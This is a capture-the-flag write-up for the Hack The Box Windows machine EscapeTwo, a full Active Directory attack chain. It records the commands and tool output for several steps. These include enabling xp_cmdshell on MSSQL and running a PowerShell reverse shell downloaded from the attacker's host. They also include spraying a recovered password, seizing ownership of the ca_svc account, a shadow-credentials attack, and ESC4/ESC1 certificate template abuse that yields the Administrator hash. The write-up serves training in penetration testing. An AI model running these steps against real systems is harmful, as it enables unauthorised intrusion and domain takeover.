EscapeTwo Hackthebox - Machine Writeup

Summary#

EscapeTwo is an easy-difficulty Windows machine that starts as an assumed-breach with some creds, we use these creds to connect to an SMB Share and find some credentials that we use to get a sql shell and then get a reverse shell and find out sql config file backup with a password that we sprayed in order to get our USER flag. Next we abuse some ACL to move laterally to a certificate service and do some ESC attacks to get our SYSTEM flag.

Enumeration#

1
┌──(kali㉿kali)-[~/Gastra/HTB/Machines/EscapeTwo]
2
└─$ nmap -sC -sV -oN nmap.txt 10.129.194.150
3
Nmap scan report for 10.129.194.150
4
Host is up (0.076s latency).
5
Not shown: 987 filtered tcp ports (no-response)
6
PORT     STATE SERVICE       VERSION
7
53/tcp   open  domain        Simple DNS Plus
8
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-01 14:16:57Z)
9
135/tcp  open  msrpc         Microsoft Windows RPC
10
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
11
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
12
|_ssl-date: 2025-09-01T14:18:17+00:00; -1s from scanner time.
13
| ssl-cert: Subject:
14
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
15
| Not valid before: 2025-06-26T11:46:45
16
|_Not valid after:  2124-06-08T17:00:40
17
445/tcp  open  microsoft-ds?
18
464/tcp  open  kpasswd5?
19
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
20
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
21
|_ssl-date: 2025-09-01T14:18:17+00:00; -1s from scanner time.
22
| ssl-cert: Subject:
23
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
24
| Not valid before: 2025-06-26T11:46:45
25
|_Not valid after:  2124-06-08T17:00:40
26
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
27
| ms-sql-info:
28
|   10.129.194.150:1433:
29
|     Version:
30
|       name: Microsoft SQL Server 2019 RTM
31
|       number: 15.00.2000.00
32
|       Product: Microsoft SQL Server 2019
33
|       Service pack level: RTM
34
|       Post-SP patches applied: false
35
|_    TCP port: 1433
36
| ms-sql-ntlm-info:
37
|   10.129.194.150:1433:
38
|     Target_Name: SEQUEL
39
|     NetBIOS_Domain_Name: SEQUEL
40
|     NetBIOS_Computer_Name: DC01
41
|     DNS_Domain_Name: sequel.htb
42
|     DNS_Computer_Name: DC01.sequel.htb
43
|     DNS_Tree_Name: sequel.htb
44
|_    Product_Version: 10.0.17763
45
|_ssl-date: 2025-09-01T14:18:17+00:00; -1s from scanner time.
46
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
47
| Not valid before: 2025-09-01T14:16:46
48
|_Not valid after:  2055-09-01T14:16:46
49
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
50
| ssl-cert: Subject:
51
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
52
| Not valid before: 2025-06-26T11:46:45
53
|_Not valid after:  2124-06-08T17:00:40
54
|_ssl-date: 2025-09-01T14:18:17+00:00; -1s from scanner time.
55
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
56
|_ssl-date: 2025-09-01T14:18:17+00:00; -1s from scanner time.
57
| ssl-cert: Subject:
58
| Subject Alternative Name: DNS:DC01.sequel.htb, DNS:sequel.htb, DNS:SEQUEL
59
| Not valid before: 2025-06-26T11:46:45
60
|_Not valid after:  2124-06-08T17:00:40
61
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
62
|_http-server-header: Microsoft-HTTPAPI/2.0
63
|_http-title: Not Found
64
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
65

66
Host script results:
67
| smb2-time:
68
|   date: 2025-09-01T14:17:39
69
|_  start_date: N/A
70
| smb2-security-mode:
71
|   3:1:1:
72
|_    Message signing enabled and required
73

74
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
75
Nmap done: 1 IP address (1 host up) scanned in 96.40 seconds

Initial Foothold & User Shell#

Browsing the SMB share we find a folder Accounting Department containing two excel documents accounting_2024.xlsx and accounts.xlsx

1
$ smbclient \\\\$IP\\'Accounting Department' -U sequel.htb\\rose
2
Password for [SEQUEL.HTB\rose]:
3
Try "help" to get a list of possible commands.
4
smb: \> dir
5
  .                                   D        0  Sun Jun  9 06:52:21 2024
6
  ..                                  D        0  Sun Jun  9 06:52:21 2024
7
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
8
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024
9

10
                6367231 blocks of size 4096. 855947 blocks available
11
smb: \> get *
12
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
13
smb: \> mget *
14
Get file accounting_2024.xlsx? yes
15
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (31.7 KiloBytes/sec) (average 31.7 KiloBytes/sec)
16
Get file accounts.xlsx? yes
17
getting file \accounts.xlsx of size 6780 as accounts.xlsx (24.6 KiloBytes/sec) (average 28.4 KiloBytes/sec)
18
smb: \> dir
19
  .                                   D        0  Sun Jun  9 06:52:21 2024
20
  ..                                  D        0  Sun Jun  9 06:52:21 2024
21
  accounting_2024.xlsx                A    10217  Sun Jun  9 06:14:49 2024
22
  accounts.xlsx                       A     6780  Sun Jun  9 06:52:07 2024
23

24
                6367231 blocks of size 4096. 848217 blocks available

I transfered the files into my host machine(Windows) but an error occured and I couldn’t open the files, it seems like the headers are corrupted let’s make sure by checking the header bytes :

TIP
Xlsx file signature headers should be 50 4B 03 04

Let’s fix the headers of the two files and open them. We found some credentials in the Accounts.xlsx file :
We can also use pyexcel-xls library to read the file after fixing it :

1
from pyexcel_xls import get_data
2
import json
3

4
data_accounts=get_data('accounts.xlsx')
5
data_accounting=get_data('accounting_2024.xlsx')
6

7
print('Accounts Data : ')
8
print(json.dumps(data_accounts,indent=4,default=str))
9

10
print('Accounting Data :')
11
print(json.dumps(data_accounting,indent=4,default=str))

Before going any further let’s enumerate a little bit more through ldap to see the users by group :

1
┌──(kali㉿kali)-[~/Gastra/HTB/Machines/EscapeTwo]
2
└─$ ldapdomaindump ldap://10.129.194.150 -u 'sequel\rose' -p 'KxEPkKe6R8su' -o escapetwo.htb
3
[*] Connecting to host...
4
[*] Binding to host
5
[+] Bind OK
6
[*] Starting domain dump
7
[+] Domain dump finished

The MSSQL is a service but part of the domain users which is odd, let’s try connecting through an sql shell and proceed to do some enumeration :

1
$ sqsh -S $IP -U sa
2
1> select name from sys.databases;
3
2> go
4
1> select SYSTEM_USER;
5
2> go
6
1> SELECT DB_NAME();
7
2> go
8
1> select * from sys.sysusers;
9
2> go
10

11
   master
12
   tempdb
13
   msdb
14
   model

All the databases are default so let’s try if we can execute shell commands, we need first to reconfigure to allow system commands to execute :

1
1> EXEC sp_configure 'xp_cmdshell', 1;
2
2> RECONFIGURE;
3
3> EXEC xp_cmdshell 'whoami';
4
4> go
5
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
6
(return status = 0)
7

8
        output
9
        ------------------------------------------------------------------------------------------------------------
10
        sequel\sql_svc
11
        NULL

After confirming that we have code execution the first thing I tried is to capture/relay hashes from there by accessing a share that points to the attacker machine for LLMNR poisonning :

1
> xp_dirtree '\\<attacker_IP>\any\thing'
2
> go

I captured the hash but it couldn’t be cracked o luck, so let’s try getting a revshell directly, I hosted a shell.ps1 revshell and load it into our target machine :

1
1> EXEC xp_cmdshell 'powershell -c iwr http://10.10.14.122:5555/shell.ps1 -o C:\programdata\rev.ps1'
2
2> go
3
1> EXEC xp_cmdshell 'powershell -c C:\programdata\rev.ps1'
4
2> go

We got our shell :
We found an sql-Configuration.INI file containing other creds :

1
type sql-Configuration.INI
2
[OPTIONS] ACTION="Install" QUIET="True" FEATURES=SQL INSTANCENAME="SQLEXPRESS" INSTANCEID="SQLEXPRESS" RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
3
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" AGTSVCSTARTUPTYPE="Manual" COMMFABRICPORT="0" COMMFABRICNETWORKLEVEL=""0" COMMFABRICENCRYPTION="0" MATRIXCMBRICKCOMMPORT="0"
4
SQLSVCSTARTUPTYPE="Automatic" FILESTREAMLEVEL="0" ENABLERANU="False"  SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
5
SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
6
SQLSYSADMINACCOUNTS="SEQUEL\Administrator" SECURITYMODE="SQL" SAPWD="MSSQLP@ssw0rd!"
7
ADDCURRENTUSERASSQLADMIN="False" TCPENABLED="1" NPENABLED="1" BROWSERSVCSTARTUPTYPE="Automatic" IAcceptSQLServerLicenseTerms=True

It seemd like we were administrators on the last sql shell we had, so there is no point of going back, let’s try to password spray the users we have enumerated with that password :

1
$ crackmapexec smb 10.129.24.149 -u users.txt -p 'WqSZAF6CysDQbGb3' -d sequel.htb --continue-on-success
2
SMB         10.129.24.149   445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
3
SMB         10.129.24.149   445    DC01             [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
4
SMB         10.129.24.149   445    DC01             [-] sequel.htb\Guest:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
5
SMB         10.129.24.149   445    DC01             [-] sequel.htb\krbtgt:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
6
SMB         10.129.24.149   445    DC01             [-] sequel.htb\michael:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
7
**SMB         10.129.24.149   445    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3**
8
SMB         10.129.24.149   445    DC01             [-] sequel.htb\oscar:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
9
SMB         10.129.24.149   445    DC01             [+] sequel.htb\sql_svc:WqSZAF6CysDQbGb3
10
SMB         10.129.24.149   445    DC01             [-] sequel.htb\rose:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE
11
SMB         10.129.24.149   445    DC01             [-] sequel.htb\ca_svc:WqSZAF6CysDQbGb3 STATUS_LOGON_FAILURE

We got ryan as a hit and since he’s part of the Remote Management Users group, we can get access with evil-winrm :

System Shell#

Now we dump some data and enumerate using bloodhound to find our next path in order to get Domain Admin :
Our user have WriteOwner over CA_SVC User so we can get full control over this service object, once we get granted full control over it, we can perform actions such as kerberoasting by requesting a TGS and cracking it, let’s start by getting full control on the CA_SVC, for this we can use 2 methods :

Using Powerview On the Target

1
*Evil-WinRM* PS C:\Users\ryan\Documents> certutil -urlcache -f http://10.10.14.205:5555/PowerView.ps1 PowerView.ps1
2
****  Online  ****
3
CertUtil: -URLCache command completed successfully.
4

5
*Evil-WinRM* PS C:\Users\ryan\Documents> powershell -ep bypass
6
Windows PowerShell
7
Copyright (C) Microsoft Corporation. All rights reserved.dir
8

9
PS C:\Users\ryan\Documents>
10
*Evil-WinRM* PS C:\Users\ryan\Documents> Import-Module .\PowerView.ps1
11

12
# Assign Ownership of the ca_svc to ryan
13
*Evil-WinRM* PS C:\Users\ryan\Documents> Set-DomainObjectOwner -Identity 'ca_svc' -OwnerIdentity 'ryan'
14

15
# Grant tyan Full Access over ca_svc
16
*Evil-WinRM* PS C:\Users\ryan\Documents> Add-DomainObjectAcl -Rights 'All' -TargetIdentity "ca_svc" -PrincipalIdentity "ryan"

Using bloodyAD & Impacket Remotely

1
$ bloodyAD --host "$IP" -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" set owner 'ca_svc' 'ryan'
2
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on ca_svc
3

4
┌──(kali㉿kali)-[~/Gastra/HTB/Machines/escapeTwo]
5
└─$ sudo impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3' -dc-ip $IP
6
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
7

8
[*] DACL backed up to dacledit-20250320-125221.bak
9
[*] DACL modified successfully!

After getting full access we can perform shadow credentials attack in order to get ca_svc NT Hash :

1
$ certipy-ad shadow auto -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -account ca_svc -dc-ip 10.129.95.232
2
[sudo] password for kali:
3
Certipy v4.8.2 - by Oliver Lyak (ly4k)
4

5
[*] Targeting user 'ca_svc'
6
[*] Generating certificate
7
[*] Certificate generated
8
[*] Generating Key Credential
9
[*] Key Credential generated with DeviceID '1cd925d1-b0ac-ac60-8eb9-bd2be9934809'
10
[*] Adding Key Credential with device ID '1cd925d1-b0ac-ac60-8eb9-bd2be9934809' to the Key Credentials for 'ca_svc'
11
[*] Successfully added Key Credential with device ID '1cd925d1-b0ac-ac60-8eb9-bd2be9934809' to the Key Credentials for 'ca_svc'
12
[*] Authenticating as 'ca_svc' with the certificate
13
[*] Using principal: ca_svc@sequel.htb
14
[*] Trying to get TGT...
15
[*] Got TGT
16
[*] Saved credential cache to 'ca_svc.ccache'
17
[*] Trying to retrieve NT hash for 'ca_svc'
18
[*] Restoring the old Key Credentials for 'ca_svc'
19
[*] Successfully restored the old Key Credentials for 'ca_svc'
20
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce

Having the ca_svc hash we can further enumerate for ADCS Certificates/Templates :

1
$ certipy-ad find -u ca_svc@sequel.htb -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -stdout -vulnerable
2

3
Certipy v4.8.2 - by Oliver Lyak (ly4k)
4

5
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
6
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
7
[*] Finding certificate templates
8
[*] Found 34 certificate templates
9
[*] Finding certificate authorities
10
[*] Found 1 certificate authority
11
[*] Found 12 enabled certificate templates
12
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
13
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
14
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
15
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
16
[*] Got CA configuration for 'sequel-DC01-CA'
17
[*] Enumeration output:
18
Certificate Authorities
19
  0
20
    CA Name                             : sequel-DC01-CA
21
    DNS Name                            : DC01.sequel.htb
22
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
23
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
24
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
25
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
26
    Web Enrollment                      : Disabled
27
    User Specified SAN                  : Disabled
28
    Request Disposition                 : Issue
29
    Enforce Encryption for Requests     : Enabled
30
    Permissions
31
      Owner                             : SEQUEL.HTB\Administrators
32
      Access Rights
33
        ManageCertificates              : SEQUEL.HTB\Administrators
34
                                          SEQUEL.HTB\Domain Admins
35
                                          SEQUEL.HTB\Enterprise Admins
36
        ManageCa                        : SEQUEL.HTB\Administrators
37
                                          SEQUEL.HTB\Domain Admins
38
                                          SEQUEL.HTB\Enterprise Admins
39
        Enroll                          : SEQUEL.HTB\Authenticated Users
40
Certificate Templates
41
  0
42
    Template Name                       : DunderMifflinAuthentication
43
    Display Name                        : Dunder Mifflin Authentication
44
    Certificate Authorities             : sequel-DC01-CA
45
    Enabled                             : True
46
    Client Authentication               : True
47
    Enrollment Agent                    : False
48
    Any Purpose                         : False
49
    Enrollee Supplies Subject           : False
50
    Certificate Name Flag               : SubjectRequireCommonName
51
                                          SubjectAltRequireDns
52
    Enrollment Flag                     : AutoEnrollment
53
                                          PublishToDs
54
    Private Key Flag                    : 16842752
55
    Extended Key Usage                  : Client Authentication
56
                                          Server Authentication
57
    Requires Manager Approval           : False
58
    Requires Key Archival               : False
59
    Authorized Signatures Required      : 0
60
    Validity Period                     : 1000 years
61
    Renewal Period                      : 6 weeks
62
    Minimum RSA Key Length              : 2048
63
    Permissions
64
      Enrollment Permissions
65
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
66
                                          SEQUEL.HTB\Enterprise Admins
67
      Object Control Permissions
68
        Owner                           : SEQUEL.HTB\Enterprise Admins
69
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
70
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
71
                                          SEQUEL.HTB\Enterprise Admins
72
                                          SEQUEL.HTB\Administrator
73
                                          SEQUEL.HTB\Cert Publishers
74
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
75
                                          SEQUEL.HTB\Enterprise Admins
76
                                          SEQUEL.HTB\Administrator
77
                                          SEQUEL.HTB\Cert Publishers
78
        Write Property Principals       : SEQUEL.HTB\Domain Admins
79
                                          SEQUEL.HTB\Enterprise Admins
80
                                          SEQUEL.HTB\Administrator
81
                                          SEQUEL.HTB\Cert Publishers
82
    [!] Vulnerabilities
83
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

It shows that sequel-DC01-CA Certifcate is vulnerable to ESC4(Enterprise Security Certificate), where ca_svc who is part of Cetr Publishers group have dangerous permissions.

ESC4 Attack, another escalation technique involving misconfigurations on the certificate template. These security issues arise when a non-administrator account can modify a certificate template and as a result gain access to privileged resources such as domain controller. In other words, any domain user can request a certificate on behalf of a Domain Admin.

So, there is a template vulnerable to ESC4. That means I have permission to change the attribute associated with that template and make it vulnerable to ESC1 , now all we need to do is the request that cert on behalf of the admin in order to get the pfx file of the Administrator so we can request his NT Hash and Authenticate to get System Flag :

1
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -dc-ip $IP -target dc01.sequel.htb
2
Certipy v4.8.2 - by Oliver Lyak (ly4k)
3

4
[*] Updating certificate template 'DunderMifflinAuthentication'
5
[*] Successfully updated 'DunderMifflinAuthentication'

1
$ certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip $IP -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns $IP -debug
2
Certipy v4.8.2 - by Oliver Lyak (ly4k)
3

4
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
5
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
6
[+] Trying to resolve 'sequel.htb' at '10.129.175.200'
7
[+] Generating RSA key
8
[*] Requesting certificate via RPC
9
[+] Trying to connect to endpoint: ncacn_np:10.129.175.200[\pipe\cert]
10
[+] Connected to endpoint: ncacn_np:10.129.175.200[\pipe\cert]
11
[*] Successfully requested certificate
12
[*] Request ID is 9
13
[*] Got certificate with UPN 'administrator@sequel.htb'
14
[*] Certificate has no object SID
15
[*] Saved certificate and private key to 'administrator.pfx'
16

17
$ certipy-ad auth -pfx administrator.pfx -domain sequel.htb -dc-ip $IP
18
Certipy v4.8.2 - by Oliver Lyak (ly4k)
19

20
[*] Using principal: administrator@sequel.htb
21
[*] Trying to get TGT...
22
[*] Got TGT
23
[*] Saved credential cache to 'administrator.ccache'
24
[*] Trying to retrieve NT hash for 'administrator'
25
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Now that we have the Admin hash we can connect using evil-winrm and grab our System FLAG :

Used Resources#

Xlsx File Signature Exploiting WriteOwner Misconfigurations in Active Directory: A Privilege Escalation Technique PKINIT FTW - Chaining Shadow Credentials and ADCS Template Abuse